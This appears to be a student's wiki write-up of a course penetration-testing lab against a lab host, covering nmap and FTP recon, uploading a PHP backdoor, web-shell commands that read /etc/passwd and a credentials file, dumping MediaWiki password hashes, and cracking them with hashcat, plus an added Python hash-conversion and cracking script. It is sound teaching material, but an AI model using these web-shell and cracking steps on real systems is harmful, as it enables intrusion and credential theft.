Lab 7.1 Exploiting pippin.shire.org (10.0.5.25) - FlameSpyro/Tech-Journal GitHub Wiki

Recon and Service Enumeration

nmap 10.0.5.25 -p 1-6000 -sV

Here is the nmap scan I used to find remote code execution:

sudo nmap -Pn -sV -p 21 --script=ftp-anon 10.0.5.25

FTP

  • To upload a file I used the following once logged in (anonymous login, no password):
ftp -i 10.0.5.25
ftp> cd upload
ftp> put testFile.txt
ftp> ls
ftp> exit
  • Using the simple-backdoor.php we found at the beginning of the lab and uploading it over FTP lets us learn more by browsing in Chrome to http://10.0.5.25/upload/testFile.php?cmd=cat+/etc/passwd

  • From there I used the LocalSettings PHP file, pulled through the web shell with curl, to find user information to get past SSH:
curl http://10.0.5.25/upload/testFile.php?cmd=cat+/var/www/html/localSettings.php > local_settings_php.txt

Deliverable 8 onwards

  • I started getting confused here so I am just going to put the steps here to record progress
  • Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist. You very likely learned about this system in SYS255, 265 and SEC260. Break out your old notes and get on with it. Describe what you found. In the end, you are looking for a new identity and a credential.
mysql -u root -p
MariaDB> show databases;
MariaDB> use mediawiki;
MariaDB> show tables;
MariaDB> describe user;
MariaDB> select user_name, user_password from user;
  • From here, I copied the hash, deleted Pippin:pbkdf2: from the beginning as well as the :64: field, and then ran hashcat on humpty. The wordlist is filtered with grep because the hint points at the letter p:
cat /usr/share/wordlists/rockyou.txt | grep "\bp" > rockyou_p.txt
hashcat -m 12100 modified_hash.txt -o cracked_modified_hash.txt -w 4 -a 0 rockyou_p.txt
  • Password was cracked and sent to loot
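As an added example (not code from the lab page or the course), the following Python script does the hash clean-up from the step above in code: it parses a MediaWiki :pbkdf2: row as returned by the SELECT, strips the user_name prefix and the key-length field into the sha512:iterations:salt:hash form that hashcat mode 12100 expects, filters a wordlist by the hinted first letter, and verifies a candidate password offline with PBKDF2-HMAC-SHA512 (a tiny stand-in for hashcat, useful for confirming a crack). The hash it works on is constructed here from the made-up password "pipeweed" and a fixed salt with MediaWiki's default sha512/30000/64 parameters; it is not the real hash from pippin.shire.org.

```python
"""Added example (not from the lab page): turn a MediaWiki user_password
value into hashcat mode 12100 input and verify a cracked candidate offline.

MediaWiki's Pbkdf2Password class stores rows as
    :pbkdf2:<algo>:<iterations>:<dkLen>:<base64 salt>:<base64 hash>
The "Pippin:" seen on the page is the user_name column from the SELECT,
not part of the hash.  hashcat -m 12100 wants
    sha512:<iterations>:<base64 salt>:<base64 hash>
which is why the lab strips the "Pippin:pbkdf2:" prefix and the ":64:" field.
"""
import base64
import hashlib
import hmac

# Constructed sample: fixed salt and the made-up password "pipeweed".
# This is NOT the hash from pippin.shire.org.
SAMPLE_PASSWORD = "pipeweed"
SAMPLE_SALT = b"0123456789abcdef"


def make_mediawiki_hash(password, salt, iterations=30000, dklen=64):
    """Build a MediaWiki-style :pbkdf2:sha512 row for a known password
    (defaults assumed to match MediaWiki's sha512 / 30000 / 64)."""
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen)
    return ":pbkdf2:sha512:%d:%d:%s:%s" % (
        iterations, dklen,
        base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def parse_mediawiki_hash(row):
    """Split a user_password value, optionally prefixed 'user_name:', into its fields."""
    if ":pbkdf2:" not in row:
        raise ValueError("not a MediaWiki :pbkdf2: hash")
    row = row[row.index(":pbkdf2:"):]          # drop the "user_name:" column prefix
    _, _, algo, iters, dklen, salt_b64, hash_b64 = row.split(":")
    return {
        "algo": algo,
        "iterations": int(iters),
        "dklen": int(dklen),
        "salt_b64": salt_b64,
        "hash_b64": hash_b64,
        "salt": base64.b64decode(salt_b64),
        "hash": base64.b64decode(hash_b64),
    }


def to_hashcat_12100(row):
    """Return the hashcat -m 12100 line: sha512:<iter>:<b64 salt>:<b64 hash>."""
    p = parse_mediawiki_hash(row)
    if p["algo"] != "sha512":
        raise ValueError("mode 12100 is PBKDF2-HMAC-SHA512 only, got " + p["algo"])
    return "sha512:%d:%s:%s" % (p["iterations"], p["salt_b64"], p["hash_b64"])


def filter_wordlist(words, prefix="p"):
    """Keep only candidates that start with the hinted first letter."""
    return [w for w in words if w.startswith(prefix)]


def verify_candidate(row, candidate):
    """Recompute PBKDF2 with the row's own parameters and compare in constant time."""
    p = parse_mediawiki_hash(row)
    dk = hashlib.pbkdf2_hmac(p["algo"], candidate.encode(), p["salt"],
                             p["iterations"], p["dklen"])
    return hmac.compare_digest(dk, p["hash"])


def crack(row, words):
    """Tiny offline stand-in for hashcat: first matching word, or None."""
    for w in words:
        if verify_candidate(row, w):
            return w
    return None


# What "select user_name, user_password from user" would print for the sample.
SAMPLE_ROW = "Pippin:" + make_mediawiki_hash(SAMPLE_PASSWORD, SAMPLE_SALT)

if __name__ == "__main__":
    print(to_hashcat_12100(SAMPLE_ROW))
    wordlist = filter_wordlist(["apple", "password", "pipeweed", "shire"])
    print(crack(SAMPLE_ROW, wordlist))
```

The hashcat line printed by the script can be written to modified_hash.txt exactly as the lab does; verify_candidate is what you run afterwards to confirm that the word hashcat reports really reproduces the stored digest before relying on it as a credential.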

Reflection

This lab was very tricky; I started to get a little scrambled trying to figure things out, which is why I broke down my steps for deliverable 8 onwards. Recon appears to be getting into my head as I remember what to do!